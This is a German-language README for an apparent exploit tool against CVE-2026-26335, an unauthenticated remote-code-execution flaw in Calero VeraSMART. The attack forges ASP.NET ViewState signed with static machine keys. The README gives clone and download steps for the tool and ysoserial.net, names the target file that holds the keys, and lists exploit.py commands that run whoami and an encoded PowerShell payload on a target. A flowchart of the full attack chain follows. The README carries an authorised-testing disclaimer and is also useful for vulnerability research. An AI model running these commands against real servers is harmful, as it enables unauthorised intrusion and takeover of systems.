
Automatisierter Exploit für CVE-2026-26335, eine kritische, nicht authentifizierte RCE in Calero VeraSMART über gefälschte ASP.NET ViewState unter Verwendung statischer Maschinenschlüssel. Enthält Endpunkt-Erkennung, Payload-Erzeugung und Befehlsausführung.
Mohammed Idrees Banyamer Sicherheitsforscher
CVE‑2026‑26335 ist eine kritische, nicht authentifizierte Remote-Code-Ausführungs-Schwachstelle in Calero VeraSMART (vor 2022 R1).
Die Anwendung verwendet statische, hartkodierte ASP.NET-Machine-Keys, die installationsübergreifend gemeinsam genutzt werden.
Ein Angreifer mit diesen Keys kann einen bösartigen ASP.NET-ViewState fälschen und serverseitige Deserialisierung → RCE auslösen.
Dieser Exploit automatisiert:
__VIEWSTATEGENERATORCWE‑321 — Hartkodierte kryptografische Schlüssel
VeraSMART-Bereitstellungen verwenden denselben ASP.NET-machineKey erneut:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
Jeder Angreifer mit Keys aus einer Installation kann alle angreifen.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
Die Keys sind nicht öffentlich. Vom Zielsystem abrufen:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
Oder über begleitendes Datei-Lesen:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — Kritisch AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Behoben in VeraSMART 2022 R1:
Workarounds:
Nur für Bildungszwecke und autorisierte Tests. Nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine Prüferlaubnis haben.
Mohammed Idrees Banyamer Sicherheitsforscher
Das folgende Diagramm veranschaulicht die Exploit-Kette von CVE‑2026‑26335 in Calero VeraSMART, bei der statische ASP.NET-Machine-Keys das Fälschen eines bösartigen ViewState ermöglichen, was zu Remote-Code-Ausführung führt.
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]